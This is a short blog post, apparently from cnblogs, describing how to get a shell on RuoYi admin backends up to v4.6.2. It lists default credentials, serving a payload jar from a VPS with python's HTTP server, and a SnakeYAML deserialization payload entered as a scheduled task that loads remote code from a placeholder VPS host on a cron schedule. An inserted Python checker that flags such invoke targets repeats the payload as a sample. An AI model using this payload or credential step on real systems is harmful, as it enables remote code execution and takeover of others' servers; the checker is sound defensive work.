RuoYi Admin Backend Getshell - yunying - cnblogs
2022-3-1 13:36:29 Author: www.cnblogs.com

RuoYi <= v4.6.2
Default credentials: admin/admin123
Modify artsploit
For a reverse shell on a Windows host, https://github.com/bkfish/yaml-payload-for-Win can be used
Put it on a VPS and start a python3 HTTP server:
python3 -m http.server
Once that is set up, add a scheduled task in the admin backend:
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vpsip:8000/yaml-payload.jar"]]]]')
Then set the Cron expression to 0/50 * * * * ?
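
A defensive check for the scheduled-task step above, added here as an example and not code from the original post or from RuoYi: it vets job invoke targets against a package allowlist, with a denylist of class-loading and remote-URL tokens as a backstop. The allowlist prefix, the function names and the sample rows are assumptions made for illustration.

```python
import re

# Assumption: only classes under this package may be scheduled (hypothetical allowlist).
ALLOWED_PREFIXES = ("com.ruoyi.quartz.task.",)
# Backstop denylist: YAML type tags, script/class-loading types, remote URL schemes.
DENY_TOKENS = ("org.yaml.snakeyaml", "javax.script", "java.net.url",
               "urlclassloader", "!!", "http://", "https://", "ldap://", "rmi://")
# owner.method(args), where owner is a bean name or a fully qualified class name.
TARGET_RE = re.compile(r"^\s*([\w$.]+)\.(\w+)\s*\((.*)\)\s*$", re.S)


def vet_invoke_target(target):
    """Return the reasons to reject an invoke target; an empty list means accept."""
    lowered = target.lower()
    reasons = [f"denied token {tok!r}" for tok in DENY_TOKENS if tok in lowered]
    match = TARGET_RE.match(target)
    if not match:
        return reasons + ["not in owner.method(args) form"]
    owner = match.group(1)
    # Assumption: a dotted owner is a class name, an undotted one a bean name.
    if "." in owner and not owner.startswith(ALLOWED_PREFIXES):
        reasons.append(f"class {owner!r} outside allowlist")
    return reasons


def audit_jobs(rows):
    """rows: iterable of (job_id, invoke_target); returns {job_id: reasons} for rejects."""
    findings = {}
    for job_id, target in rows:
        reasons = vet_invoke_target(target)
        if reasons:
            findings[job_id] = reasons
    return findings


# Constructed sample rows; job 3 is the invoke target shown on this page.
SAMPLE_JOBS = [
    (1, "demoTask.run('nightly')"),
    (2, "com.ruoyi.quartz.task.DemoTask.run()"),
    (3, """org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://vpsip:8000/yaml-payload.jar"]]]]')"""),
    (4, "org.example.Other.run()"),
]

if __name__ == "__main__":
    for job_id, reasons in audit_jobs(SAMPLE_JOBS).items():
        print(job_id, "; ".join(reasons))
```

The same function can be run at job creation time to reject a target and over existing job rows to find ones that were already stored.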

Historical vulnerabilities:
https://doc.ruoyi.vip/ruoyi/document/kslj.html#历史漏洞
Additional:
https://xz.aliyun.com/t/10637

posted @ 2021-12-08 14:32  yunying



Source: https://www.cnblogs.com/BOHB-yunying/p/15661384.html